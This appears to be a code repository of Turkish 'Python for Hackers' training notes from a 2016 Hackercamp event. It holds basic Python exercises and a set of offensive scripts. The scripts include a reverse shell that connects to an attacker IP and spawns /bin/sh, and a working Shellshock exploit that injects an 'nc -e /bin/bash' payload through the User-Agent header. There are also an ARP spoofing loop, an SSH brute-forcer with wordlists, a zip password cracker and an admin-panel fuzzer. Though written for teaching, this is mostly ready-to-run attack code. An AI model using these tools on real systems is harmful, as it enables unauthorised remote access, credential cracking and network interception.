├── .gitignore ├── examples ├── wordlist │ ├── password.txt │ ├── username.txt │ ├── big.txt │ ├── zip.txt │ └── admin-panels.txt ├── zip_file │ └── ex.zip ├── reverse_shell.py ├── arp_poison.py ├── README.md ├── nmap_handler.py ├── zip_cracker.py ├── zone.py ├── fuzzer.py ├── ssh_brute.py └── shellshock.py ├── basic ├── user.py ├── README.md ├── b64encode.py ├── image.py ├── ex_thread.py ├── ex_argparse.py └── b64decode.py ├── documents ├── python.pdf └── README.md └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | *.pyc 3 | -------------------------------------------------------------------------------- /examples/wordlist/password.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 12345 3 | asdasd 4 | pass1 5 | pass22 -------------------------------------------------------------------------------- /basic/user.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | subprocess.call(["useradd", "testuser"]) 3 | -------------------------------------------------------------------------------- /examples/wordlist/username.txt: -------------------------------------------------------------------------------- 1 | ali 2 | veli 3 | mehmet 4 | ahmet 5 | secret 6 | username -------------------------------------------------------------------------------- /documents/python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mazlum/hackercamp2016-pfh/HEAD/documents/python.pdf -------------------------------------------------------------------------------- /examples/wordlist/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mazlum/hackercamp2016-pfh/HEAD/examples/wordlist/big.txt -------------------------------------------------------------------------------- /examples/zip_file/ex.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mazlum/hackercamp2016-pfh/HEAD/examples/zip_file/ex.zip -------------------------------------------------------------------------------- /basic/README.md: -------------------------------------------------------------------------------- 1 | ## Note 2 | 3 | 2 gün boyunca arkadaşlar ile eğitim sırasında beraber geliştirmiş olduğumuz basit python scriptleri. 4 | -------------------------------------------------------------------------------- /basic/b64encode.py: -------------------------------------------------------------------------------- 1 | import base64 2 | 3 | flag = "Hackercamp 2016 biz buradayiz oley" 4 | for i in range(10): 5 | flag = base64.b64encode(flag) 6 | 7 | print flag 8 | -------------------------------------------------------------------------------- /basic/image.py: -------------------------------------------------------------------------------- 1 | from pyquery import PyQuery 2 | import urllib 3 | 4 | images = PyQuery("http://mazlumagar.com")('img') 5 | 6 | for k, i in enumerate(images): 7 | urllib.urlretrieve(i.get("src"), "images/{}.jpg".format(k)) 8 | -------------------------------------------------------------------------------- /documents/README.md: -------------------------------------------------------------------------------- 1 | ## Note 2 | 3 | Bu döküman Halit Alptekin tarafından daha önceki hackercamp için hazırlanmıştır. Düzenlemiş olduğumuz hackercamp etkinliğinde aynı konu içeriğini 4 | kullandığımız için bu döküman üzerinden anlatım yapılmıştır. -------------------------------------------------------------------------------- /examples/reverse_shell.py: -------------------------------------------------------------------------------- 1 | import socket, subprocess, os, pty 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | s.connect(("192.168.2.8", 4444)) 5 | os.dup2(s.fileno(), 0) 6 | os.dup2(s.fileno(), 1) 7 | os.dup2(s.fileno(), 2) 8 | os.putenv("HISTFILE", '/dev/null') 9 | # pty.spawn("/bin/bash") 10 | p = subprocess.call(["/bin/sh", "-i"]) 11 | s.close() 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Octosec - Hackercamp, Python for Hacker Eğitim Notları 2 | 3 | 20-21 Şubat 2016 tarihinde Octosec ekipi olarak düzenlediğimiz Hackercamp etkinliğinin Python for Hacker eğitim notları. 4 | 5 | 1. **documents** 6 | - Eğitimde kullanılan döküman 7 | 2. **basic** 8 | - Eğitimde yazılan basit python scriptleri 9 | 3. **examples** 10 | - Eğitim için hazırlanan python scriptleri 11 | -------------------------------------------------------------------------------- /basic/ex_thread.py: -------------------------------------------------------------------------------- 1 | import thread 2 | import time 3 | 4 | 5 | def print_time(threadName, delay): 6 | count = 0 7 | while count < 5: 8 | time.sleep(delay) 9 | count += 1 10 | print "%s: %s" % (threadName, time.ctime(time.time())) 11 | 12 | try: 13 | thread.start_new_thread(print_time, ("Thread-1", 2, )) 14 | thread.start_new_thread(print_time, ("Thread-2", 4, )) 15 | except Exception as e: 16 | print "Error: unable to start thread" 17 | 18 | 19 | while True: 20 | pass -------------------------------------------------------------------------------- /basic/ex_argparse.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | import argparse 3 | import sys 4 | 5 | 6 | description = """ 7 | argparse basic example 8 | Example: python ex_argparse.py --domain http://example.com 9 | """ 10 | 11 | parser = argparse.ArgumentParser("example", description) 12 | parser.add_argument("--domain", "-d", help="domain", required=True) 13 | args = parser.parse_args() 14 | 15 | 16 | if __name__ == "__main__": 17 | if len(sys.argv) == 1: 18 | print parser.print_help() 19 | exit(0) 20 | print args.domain 21 | -------------------------------------------------------------------------------- /examples/arp_poison.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | from scapy.all import * 4 | 5 | conf.verb = 0 6 | 7 | op = 2 8 | attacker_mac = '34:36:3b:c8:f9:70' 9 | gateway = '192.168.43.1' 10 | target_ip = '255.255.255.255' 11 | target_mac = "ff:ff:ff:ff:ff:ff" 12 | 13 | arp = ARP(op=op, psrc=gateway, pdst=target_ip, hwsrc=attacker_mac, hwdst=target_mac) 14 | 15 | print "Arp Spoof started.." 16 | try: 17 | while True: 18 | send(arp) 19 | time.sleep(1) 20 | except KeyboardInterrupt: 21 | print "Arp spoof finished.." 22 | 23 | # Scapy Cheatsheet : https://github.com/besimaltnok/scapy-cheatsheet 24 | -------------------------------------------------------------------------------- /basic/b64decode.py: -------------------------------------------------------------------------------- 1 | import base64 2 | 3 | s = "Vm0wd2QyVkZOVWRXV0doVFYwZDRWRll3Wkc5V1ZsbDNXa1JTVjFKdGVEQmFWVll3VmpGS2MySkVUbGhoTVVwVVZqQmFTMlJIVmtWUmJGWlhZa1Z3VlZacVNqUlpWMDE0Vkc1T2FWSXdXbFJXYWtaTFUxWmFjbHBFVWxSTmJFcEpWbGQwVjFaWFNraFZiRkpWVmtWYVRGWkdXbXRYUjFKSVVteHdWMkpJUWxsV1ZFa3hVekZrU0ZOclpHcFRSVXBYV1d4b1UwMHhXa2RYYlVaWFZtczFlRlpYZUZOaFZscHlWMVJHVjJFeVVYZFpla1p6VmpGT1dWcEdhR2xTTW1oWFZtMDFkMVl5VW5OV2JrNVlZbGhTV0ZSV1pGTk5SbkJHVjIxR1ZXSkdiRFJWTW5oelZqSkZlVlJZYUZkV1JYQklWV3BHVDFkV2NFZGhSMnhUWVROQ1dGWnRNVFJaVjFGNVZteGthbEpzY0ZsWmJHaFRWMFpTVjFwR1RrNVNiRVkwVjJ0U1EyRkdXbkppZWtwYVYwaENTRlpxUm1GU2JHUjFWMnh3YkdFelFrMVdWM0JIVkRGa1dGUnJhR2hTYkVwVVZtdGFZVmRzV25STlNHaFBVbXRzTTFSVmFHOVdiR1JJWVVaU1YyRXlVVEJXVjNoaFZqRldXVnBHUWxaV1JFRTE=" 4 | while True: 5 | s = base64.b64decode(s) 6 | if "2016" in s: 7 | break 8 | print s 9 | -------------------------------------------------------------------------------- /examples/wordlist/zip.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 00 3 | 000000 4 | 00000000 5 | 0007 6 | 007 7 | 01 8 | 02 9 | 0246 10 | 0249 11 | 03 12 | 1 13 | 10 14 | 100 15 | 1000 16 | 1022 17 | 10sne1 18 | 111111 19 | 121212 20 | 1225 21 | 123 22 | 123123 23 | 1234 24 | s3cr3tpassw0rd 25 | 123456 26 | 1234567 27 | 12345678 28 | 1234qwer 29 | 123abc 30 | 123go 31 | 1313 32 | 131313 33 | 13579 34 | 14430 35 | 1701d 36 | 1928 37 | 1951 38 | 1a2b3c 39 | 1p2o3i 40 | 1q2w3e 41 | 1qw23e 42 | 1sanjose 43 | 2 44 | 20 45 | 200 46 | 2000 47 | 2001 48 | 2002 49 | 2003 50 | 2112 51 | 21122112 52 | 2222 53 | 2welcome 54 | 3 55 | 369 56 | 4444 57 | 4runner 58 | 5252 59 | 54321 60 | 5555 61 | 5683 62 | 654321 63 | 666666 64 | 6969 65 | 696969 66 | 777 67 | 7777 68 | 80486 69 | 8675309 70 | 888888 71 | 90210 72 | 911 73 | 92072 74 | 99999999 75 | @ 76 | Administration 77 | DEMO 78 | Demo 79 | Log 80 | Logs 81 | PRUEBA 82 | PRUEBAS 83 | Pages 84 | Prova 85 | Provas 86 | Pruebas 87 | Servlet 88 | Servlets 89 | Sources 90 | Statistics 91 | Stats 92 | TEST 93 | TESTS 94 | Test 95 | Tests 96 | a 97 | a12345 98 | a1b2c3 99 | a1b2c3d4 -------------------------------------------------------------------------------- /examples/README.md: -------------------------------------------------------------------------------- 1 | ## Python for Hackers 2 | 3 | Python for Hackers eğitimi için geliştirmiş olduğum örnek uygulamalar. 4 | 5 | 1. **arp_poison.py** 6 | - Kurban bilgisayara sürekli arp paketi göndererek, bilgisayarın arp tablosunda gateway mac adresini değiştirmesine sebep olur. 7 | 2. **fuzzer.py** 8 | - Parametre olarak alınan domain üzerinde wordlist üzerinden fuzzing işlemi yapar. 9 | 3. **nmap_handler.py** 10 | - Sistemdeki nmapi çalıştırarak xml olarak aldığı çıktıyı ekrana basar. 11 | 4. **reverse_shell.py** 12 | - Kurban bilgisayarında çalıştırıldığında saldırgan bilgisayarına reverse shell açar. 13 | 5. **shellshock.py** 14 | - Shellshock açığını exploit ederek reverse shell alınmasını sağlar. 15 | 6. **ssh_brute.py** 16 | - Ssh servisine brute force atağı yaparak username, password bulunmasını sağlar. 17 | 7. **zip_cracker.py** 18 | - Şifre koruması konulmuş bir zip dosyasına brute force atağı yaparak, şifre kırma işlemi gerçekleştirir. 19 | 8. **zone.py** 20 | - Parametre olarak aldığı domain üzerinde zone trasfer kontolü yapar. Zone transfer açık olan bir ns tespit edilirse sonucu dosyaya kaydeder. 21 | 22 | -------------------------------------------------------------------------------- /examples/nmap_handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | import argparse 3 | import sys 4 | import subprocess 5 | from .dom import minidom 6 | 7 | description = """ 8 | nmap handler with python for hackercamp 9 | Example: python nmap_handler.py --host www.example.com 10 | """ 11 | 12 | parser = argparse.ArgumentParser("nmap handler", description) 13 | parser.add_argument("--host", help="--host ", required=True) 14 | args = parser.parse_args() 15 | 16 | 17 | def nmap_handler(): 18 | nmap_params = ['nmap', '-sV', '-n', '--open', args.host, '-oX', '-'] 19 | process = subprocess.Popen(nmap_params, stdout=subprocess.PIPE) 20 | result, _ = process.communicate() 21 | return result 22 | 23 | 24 | def main(): 25 | result = nmap_handler() 26 | xml = minidom.parseString(result) 27 | ports = xml.lastChild.getElementsByTagName('port') 28 | hosts = xml.lastChild.getElementsByTagName('hosts')[0] 29 | host_status = "Up" if int(hosts.attributes['up'].value) else "Down" 30 | print "[*] Host is {}".format(host_status) 31 | for port in ports: 32 | port_id = port.attributes['portid'].value 33 | service = port.getElementsByTagName('service')[0].attributes['product'].value 34 | protocol = port.attributes['protocol'].value 35 | print "[*] Open Port: {0:5} {1:15} {2:5}".format(port_id, service, protocol) 36 | 37 | 38 | if __name__ == "__main__": 39 | if len(sys.argv) == 1: 40 | print parser.print_help() 41 | exit(0) 42 | main() 43 | -------------------------------------------------------------------------------- /examples/zip_cracker.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | import argparse 3 | import sys 4 | import zipfile 5 | import os 6 | from termcolor import colored 7 | 8 | 9 | SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__)) 10 | DEFAULT_WORD_LIST = os.path.join(SCRIPT_PATH, "wordlist", "zip.txt") 11 | 12 | description = """ 13 | zip cracker for hackercamp 14 | Example: python zip_cracker.py --file /home/user/file.zip --wordlist /home/user/wordlist.txt 15 | """ 16 | 17 | parser = argparse.ArgumentParser("zip cracker", description) 18 | parser.add_argument("--wordlist", "-w", help="wordlist path, format:/home/user/wordlist.txt", default=DEFAULT_WORD_LIST) 19 | parser.add_argument("--file", "-f", help="file path, format: /home/user/file.zip", required=True) 20 | args = parser.parse_args() 21 | 22 | 23 | def cracker(): 24 | zip_file = zipfile.ZipFile(args.file) 25 | with open(args.wordlist, 'r') as f: 26 | for line in f.readlines(): 27 | password = line.strip('\n') 28 | try: 29 | zip_file.extractall(pwd=password) 30 | print "Password has been found : {}".format(colored(password, "green")) 31 | exit() 32 | except zipfile.BadZipfile: 33 | print "Bad Zip File.." 34 | exit() 35 | except RuntimeError: 36 | pass 37 | print "Password not found.." 38 | 39 | if __name__ == "__main__": 40 | if len(sys.argv) == 1: 41 | print parser.print_help() 42 | exit(0) 43 | cracker() 44 | -------------------------------------------------------------------------------- /examples/zone.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | import dns.query 3 | import dns.zone 4 | import socket 5 | import dns.exception 6 | import argparse 7 | import sys 8 | 9 | description = """ 10 | Zone transfer script for hackercamp 11 | Example: python zone.py --domain 12 | """ 13 | 14 | parser = argparse.ArgumentParser("zone transfer", description) 15 | parser.add_argument("--domain", "-d", help="domain, format:example.com", required=True) 16 | args = parser.parse_args() 17 | 18 | 19 | def get_ns(domain): 20 | try: 21 | name_servers = dns.resolver.query(domain, 'NS') 22 | return name_servers 23 | except dns.resolver.NoNameservers: 24 | print "Domain: {} has no ns records.".format(domain) 25 | except dns.resolver.NXDOMAIN: 26 | print "Non-existent domain: {}".format(domain) 27 | except dns.exception.Timeout: 28 | print "Timeout" 29 | except dns.resolver.NoAnswer: 30 | print "Problem getting NS record" 31 | exit() 32 | 33 | 34 | def zone(domain): 35 | for name_server in get_ns(domain): 36 | print "Trying for {}".format(name_server) 37 | try: 38 | xfer = dns.zone.from_xfr(dns.query.xfr(str(name_server), domain)) 39 | names = xfer.nodes.keys() 40 | names.sort() 41 | with open('zone.txt', 'w') as f: 42 | for n in names: 43 | f.write(xfer[n].to_text(n)) 44 | print "Zone transfer has been found for {}. Result has been writed zone.txt".format(name_server) 45 | exit() 46 | except dns.zone.NoNS: 47 | print "Domain: {} exists, but has no ns records..".format(domain) 48 | except dns.resolver.NXDOMAIN: 49 | print "Domain: unresponsive, try again" 50 | except dns.exception.FormError: 51 | print "Xfer refused.." 52 | except EOFError: 53 | print "EOFError" 54 | except KeyboardInterrupt: 55 | print "User cancelled" 56 | except KeyError as e: 57 | print "KeyError {}".format(e) 58 | except socket.error: 59 | print "Failed: connection refused" 60 | print "Zone transfer not found.." 61 | 62 | if __name__ == "__main__": 63 | if len(sys.argv) < 2: 64 | print parser.print_help() 65 | exit() 66 | zone(args.domain) 67 | -------------------------------------------------------------------------------- /examples/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | import argparse 3 | import sys 4 | import requests 5 | import os 6 | from termcolor import colored 7 | 8 | SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__)) 9 | DEFAULT_WORD_LIST = os.path.join(SCRIPT_PATH, "wordlist", "admin-panels.txt") 10 | COLOR = {404: "red", 200: "green", 301: "blue", 302: "blue"} 11 | 12 | description = """ 13 | This fuzzer script has been writed for hackercamp 14 | Example: python fuzzer.py --url http://example.com/FUZZ --hc 404 --wordlist /home/user/wordlist.txt 15 | """ 16 | 17 | parser = argparse.ArgumentParser("fuzzer", description) 18 | parser.add_argument("--wordlist", "-w", help="wordlist path, format:/home/user/wordlist.txt", default=DEFAULT_WORD_LIST) 19 | parser.add_argument("--url", "-u", help="fuzzing url, format: http://www.example.com/FUZZ", required=True) 20 | parser.add_argument("--hc", help="ignore http response", default="") 21 | args = parser.parse_args() 22 | 23 | 24 | def get_color(code): 25 | try: 26 | return COLOR[code] 27 | except KeyError: 28 | return "white" 29 | 30 | 31 | def fuzzing(): 32 | if not args.url.endswith("FUZZ"): 33 | print "Please enter url this format: http://www.example.com/FUZZ" 34 | exit(0) 35 | url = args.url.split('FUZZ')[0] 36 | args.hc = args.hc.split(",") 37 | print "====================" 38 | print "Response Request" 39 | print "====================" 40 | with open(args.wordlist, "r") as f: 41 | for line in f.readlines(): 42 | line = line.strip() 43 | 44 | try: 45 | req = requests.head("{}{}".format(url, line)) 46 | except requests.exceptions.ConnectionError: 47 | print "Connection Error.." 48 | exit(0) 49 | 50 | if str(req.status_code) in args.hc: 51 | sys.stdout.write('\x1b[K{} {}\r'.format(colored(req.status_code, get_color(req.status_code)), 52 | line)) 53 | else: 54 | sys.stdout.write('{} {}\n'.format(colored(req.status_code, get_color(req.status_code)), line)) 55 | sys.stdout.flush() 56 | 57 | 58 | if __name__ == "__main__": 59 | if len(sys.argv) == 1: 60 | print parser.print_help() 61 | exit(0) 62 | fuzzing() 63 | -------------------------------------------------------------------------------- /examples/ssh_brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | import paramiko 3 | import argparse 4 | import os 5 | import sys 6 | from termcolor import colored 7 | 8 | 9 | SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__)) 10 | DEFAULT_USER_LIST = os.path.join(SCRIPT_PATH, "wordlist", "username.txt") 11 | DEFAULT_PASS_LIST = os.path.join(SCRIPT_PATH, "wordlist", "password.txt") 12 | 13 | description = """ 14 | Ssh brute force script for hackercamp 15 | Example: python ssh_brute.py --host --port --userlist --passlist 16 | """ 17 | 18 | parser = argparse.ArgumentParser("ssh brute", description) 19 | parser.add_argument("--userlist", "-u", help="wordlist for username, format:/home/user/userlist.txt", 20 | default=DEFAULT_USER_LIST) 21 | parser.add_argument("--passlist", "-p", help="wordlist for password, format:/home/user/passlist.txt", 22 | default=DEFAULT_PASS_LIST) 23 | parser.add_argument("--host", help="host address", required=True) 24 | parser.add_argument("--port", help="port number", default=22) 25 | args = parser.parse_args() 26 | 27 | 28 | def brute_force(): 29 | with open(args.userlist, "r") as user_file: 30 | with open(args.passlist, "r") as pass_file: 31 | user_list = user_file.readlines() 32 | pass_list = pass_file.readlines() 33 | for u in user_list: 34 | for p in pass_list: 35 | u, p = u.strip("\n"), p.strip("\n") 36 | try: 37 | ssh = paramiko.SSHClient() 38 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 39 | ssh.connect(args.host, port=args.port, username=u, password=p) 40 | print "Username: {}, password: {} has been found".format(colored(u, "green"), 41 | colored(p, "green")) 42 | exit() 43 | except paramiko.ssh_exception.AuthenticationException: 44 | sys.stdout.write('\x1b[KUsername: {}, password: {} wrong\r'.format(colored(u, "red"), 45 | colored(p, "red"))) 46 | sys.stdout.flush() 47 | print "\nUsername password has been not found.." 48 | 49 | if __name__ == "__main__": 50 | if len(sys.argv) == 1: 51 | print parser.print_help() 52 | exit(0) 53 | brute_force() 54 | -------------------------------------------------------------------------------- /examples/shellshock.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | import requests 4 | import cmd 5 | 6 | 7 | class ListenerThread(threading.Thread): 8 | def __init__(self, host, port): 9 | threading.Thread.__init__(self) 10 | self.host = host 11 | self.port = port 12 | self.result = None 13 | self.connection = None 14 | 15 | def run(self): 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | server_address = (self.host, self.port) 18 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 19 | s.bind(server_address) 20 | s.listen(5) 21 | self.connection, client_address = s.accept() 22 | 23 | def execute(self, command): 24 | try: 25 | self.connection.send(command+"\n") 26 | print self.connection.recv(1024) 27 | except AttributeError: 28 | print "Connection error. Please check parameters.." 29 | 30 | def close(self): 31 | self.connection.close() 32 | 33 | 34 | class ExploitThread(threading.Thread): 35 | def __init__(self, victim_host, host, port): 36 | threading.Thread.__init__(self) 37 | self.host = host 38 | self.port = port 39 | self.victim_host = victim_host 40 | 41 | def run(self): 42 | requests.get('http://' + self.victim_host + '/cgi-bin/status', 43 | headers={"User-Agent": "() { :;}; /usr/bin/nc " + self.host + " " + self.port + " -e /bin/bash"}) 44 | 45 | 46 | class Console(cmd.Cmd): 47 | def __init__(self): 48 | cmd.Cmd.__init__(self) 49 | self.prompt = "$hackercamp> " 50 | self.params = {} 51 | self.worker_listener = None 52 | 53 | def do_set(self, line): 54 | key, value = line.split() 55 | self.params[key] = value 56 | 57 | def do_show(self, line): 58 | if line == 'options': 59 | for key, value in self.params.items(): 60 | print '[!] {} = {}'.format(key, value) 61 | else: 62 | print '[!] not found' 63 | 64 | def do_exploit(self, line): 65 | self.worker_listener = ListenerThread(self.params['lhost'], int(self.params['lport'])) 66 | self.worker_listener.start() 67 | self.worker_exploit = ExploitThread(self.params['rhost'], self.params['lhost'], self.params['lport']) 68 | self.worker_exploit.start() 69 | print "[+] Exploit successfully :)" 70 | 71 | def do_run(self, line): 72 | self.worker_listener.execute(line) 73 | 74 | def do_exit(self, line): 75 | self.worker_listener.close() 76 | return True 77 | 78 | def do_EOF(self, line): 79 | print 80 | self.do_exit(line) 81 | return True 82 | 83 | def do_quit(self, line): 84 | self.do_exit(line) 85 | return True 86 | 87 | def emptyline(self): 88 | pass 89 | 90 | 91 | if __name__ == "__main__": 92 | console = Console() 93 | console.cmdloop() 94 | -------------------------------------------------------------------------------- /examples/wordlist/admin-panels.txt: -------------------------------------------------------------------------------- 1 | wp-login.php 2 | admin.php 3 | admin/ 4 | administrator/ 5 | moderator/ 6 | webadmin/ 7 | adminarea/ 8 | bb-admin/ 9 | adminLogin/ 10 | admin_area/ 11 | panel-administracion/ 12 | instadmin/ 13 | memberadmin/ 14 | administratorlogin/ 15 | adm/ 16 | admin/account.php 17 | admin/index.php 18 | admin/login.php 19 | admin/admin.php 20 | admin/account.php 21 | joomla/administrator 22 | login.php 23 | admin_area/admin.php 24 | admin_area/login.php 25 | siteadmin/login.php 26 | siteadmin/index.php 27 | siteadmin/login.html 28 | admin/account.html 29 | admin/index.html 30 | admin/login.html 31 | admin/admin.html 32 | admin_area/index.php 33 | bb-admin/index.php 34 | bb-admin/login.php 35 | bb-admin/admin.php 36 | admin/home.php 37 | admin_area/login.html 38 | admin_area/index.html 39 | admin/controlpanel.php 40 | admincp/index.asp 41 | admincp/login.asp 42 | admincp/index.html 43 | admin/account.html 44 | adminpanel.html 45 | webadmin.html 46 | webadmin/index.html 47 | webadmin/admin.html 48 | webadmin/login.html 49 | admin/admin_login.html 50 | admin_login.html 51 | panel-administracion/login.html 52 | admin/cp.php 53 | cp.php 54 | administrator/index.php 55 | administrator/login.php 56 | nsw/admin/login.php 57 | webadmin/login.php 58 | admin/admin_login.php 59 | admin_login.php 60 | administrator/account.php 61 | administrator.php 62 | admin_area/admin.html 63 | pages/admin/admin-login.php 64 | admin/admin-login.php 65 | admin-login.php 66 | bb-admin/index.html 67 | bb-admin/login.html 68 | bb-admin/admin.html 69 | admin/home.html 70 | modelsearch/login.php 71 | moderator.php 72 | moderator/login.php 73 | moderator/admin.php 74 | account.php 75 | pages/admin/admin-login.html 76 | admin/admin-login.html 77 | admin-login.html 78 | controlpanel.php 79 | admincontrol.php 80 | admin/adminLogin.html 81 | adminLogin.html 82 | admin/adminLogin.html 83 | home.html 84 | rcjakar/admin/login.php 85 | adminarea/index.html 86 | adminarea/admin.html 87 | webadmin.php 88 | webadmin/index.php 89 | webadmin/admin.php 90 | admin/controlpanel.html 91 | admin.html 92 | admin/cp.html 93 | cp.html 94 | adminpanel.php 95 | moderator.html 96 | administrator/index.html 97 | administrator/login.html 98 | user.html 99 | administrator/account.html 100 | administrator.html 101 | login.html 102 | modelsearch/login.html 103 | moderator/login.html 104 | adminarea/login.html 105 | panel-administracion/index.html 106 | panel-administracion/admin.html 107 | modelsearch/index.html 108 | modelsearch/admin.html 109 | admincontrol/login.html 110 | adm/index.html 111 | adm.html 112 | moderator/admin.html 113 | user.php 114 | account.html 115 | controlpanel.html 116 | admincontrol.html 117 | panel-administracion/login.php 118 | adminLogin.php 119 | admin/adminLogin.php 120 | home.php 121 | adminarea/index.php 122 | adminarea/admin.php 123 | adminarea/login.php 124 | panel-administracion/index.php 125 | panel-administracion/admin.php 126 | modelsearch/index.php 127 | modelsearch/admin.php 128 | admincontrol/login.php 129 | adm/admloginuser.php 130 | admloginuser.php 131 | admin2.php 132 | admin2/login.php 133 | admin2/index.php 134 | adm/index.php 135 | adm.php 136 | affiliate.php 137 | adm_auth.php 138 | yonetim 139 | --------------------------------------------------------------------------------